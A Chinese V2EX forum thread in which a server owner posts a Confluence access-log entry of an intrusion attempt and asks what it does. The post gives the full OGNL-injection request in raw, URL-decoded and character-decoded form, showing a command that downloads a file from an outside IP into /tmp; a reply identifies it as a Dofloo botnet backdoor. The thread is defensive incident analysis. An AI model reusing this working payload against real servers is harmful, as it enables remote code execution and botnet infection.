V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
heyjei
V2EX  ›  问与答

各位能帮我看看这个网站是干嘛的嘛,一直在入侵我的服务器

  •  
  •   heyjei · 2022-07-02 23:06:41 +08:00 · 1339 次点击
    这是一个创建于 878 天前的主题,其中的信息可能已经有所发展或是发生改变。

    网站 ( http://101.43.177.155/) 在 confluence 的 access log 里发现的

    [30/Jun/2022:00:00:03 +0800] - http-nio-6090-exec-400 101.43.177.155 GET //%24%7BClass.forName%28%22com%22%2B%22.opensymphony%22%2B%22.webwork%22%2B%22.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22CmdResponse%22%2CClass.forName%28%22javax%22%2B%22.script%22%2B%22.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C115%2C61%2C39%2C39%2C59%2C118%2C97%2C114%2C32%2C112%2C112%2C32%2C61%2C32%2C106%2C97%2C118%2C97%2C46%2C108%2C97%2C110%2C103%2C46%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C103%2C101%2C116%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C40%2C41%2C46%2C101%2C120%2C101%2C99%2C40%2C39%2C119%2C103%2C101%2C116%2C32%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C57%2C50%2C46%2C49%2C49%2C56%2C46%2C49%2C56%2C56%2C46%2C49%2C54%2C55%2C58%2C53%2C55%2C56%2C57%2C47%2C104%2C97%2C111%2C32%2C45%2C80%2C32%2C47%2C116%2C109%2C112%2C47%2C39%2C41%2C46%2C103%2C101%2C116%2C73%2C110%2C112%2C117%2C116%2C83%2C116%2C114%2C101%2C97%2C109%2C40%2C41%2C59%2C119%2C104%2C105%2C108%2C101%2C32%2C40%2C49%2C41%2C32%2C123%2C118%2C97%2C114%2C32%2C98%2C32%2C61%2C32%2C112%2C112%2C46%2C114%2C101%2C97%2C100%2C40%2C41%2C59%2C105%2C102%2C32%2C40%2C98%2C32%2C61%2C61%2C32%2C45%2C49%2C41%2C32%2C123%2C98%2C114%2C101%2C97%2C107%2C59%2C125%2C115%2C61%2C115%2C43%2C83%2C116%2C114%2C105%2C110%2C103%2C46%2C102%2C114%2C111%2C109%2C67%2C104%2C97%2C114%2C67%2C111%2C100%2C101%2C40%2C98%2C41%2C125%2C59%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C66%2C97%2C115%2C101%2C54%2C52%2C46%2C103%2C101%2C116%2C85%2C114%2C108%2C69%2C110%2C99%2C111%2C100%2C101%2C114%2C40%2C41%2C46%2C101%2C110%2C99%2C111%2C100%2C101%2C84%2C111%2C83%2C116%2C114%2C105%2C110%2C103%2C40%2C115%2C46%2C103%2C101%2C116%2C66%2C121%2C116%2C101%2C115%2C40%2C41%2C41%29%29%22%29%29%7D/ HTTP/1.0 302 7042ms - - python-requests/2.28.0

    url decode 之后是 [30/Jun/2022:00:00:03+0800]-http-nio-6090-exec-400101.43.177.155GET//${Class.forName("com"+".opensymphony"+".webwork"+".ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("CmdResponse",Class.forName("javax"+".script"+".ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("eval(String.fromCharCode(118,97,114,32,115,61,39,39,59,118,97,114,32,112,112,32,61,32,106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,39,119,103,101,116,32,104,116,116,112,58,47,47,57,50,46,49,49,56,46,49,56,56,46,49,54,55,58,53,55,56,57,47,104,97,111,32,45,80,32,47,116,109,112,47,39,41,46,103,101,116,73,110,112,117,116,83,116,114,101,97,109,40,41,59,119,104,105,108,101,32,40,49,41,32,123,118,97,114,32,98,32,61,32,112,112,46,114,101,97,100,40,41,59,105,102,32,40,98,32,61,61,32,45,49,41,32,123,98,114,101,97,107,59,125,115,61,115,43,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,98,41,125,59,106,97,118,97,46,117,116,105,108,46,66,97,115,101,54,52,46,103,101,116,85,114,108,69,110,99,111,100,101,114,40,41,46,101,110,99,111,100,101,84,111,83,116,114,105,110,103,40,115,46,103,101,116,66,121,116,101,115,40,41,41))"))}/HTTP/1.03027042ms--python-requests/2.28.0

    String.fromCharCode 解析之后是 "var s='';var pp = java.lang.Runtime.getRuntime().exec('wget http://92.118.188.167:5789/hao -P /tmp/').getInputStream();while (1) {var b = pp.read();if (b == -1) {break;}s=s+String.fromCharCode(b)};java.util.Base64.getUrlEncoder().encodeToString(s.getBytes())""var s='';var pp = java.lang.Runtime.getRuntime().exec('wget http://92.118.188.167:5789/hao -P /tmp/').getInputStream();while (1) {var b = pp.read();if (b == -1) {break;}s=s+String.fromCharCode(b)};java.util.Base64.getUrlEncoder().encodeToString(s.getBytes())"

    接下来分析思路就没了,各位彦祖有啥想法嘛,他是干啥的?

    3 条回复    2022-07-05 14:01:14 +08:00
    Tukali
        1
    Tukali  
       2022-07-03 11:05:45 +08:00
    wget http://92.118.188.167:5789/hao
    这里要干坏事的样本不是给你了吗,下下来,分析一下看看这个文件是干啥的就好了啊
    heyjei
        2
    heyjei  
    OP
       2022-07-03 11:34:37 +08:00
    @Tukali 二进制的看不懂,心塞。
    eviladan0s
        3
    eviladan0s  
       2022-07-05 14:01:14 +08:00   ❤️ 1
    Dofloo 僵尸网络的后门
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3384 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 11:38 · PVG 19:38 · LAX 03:38 · JFK 06:38
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.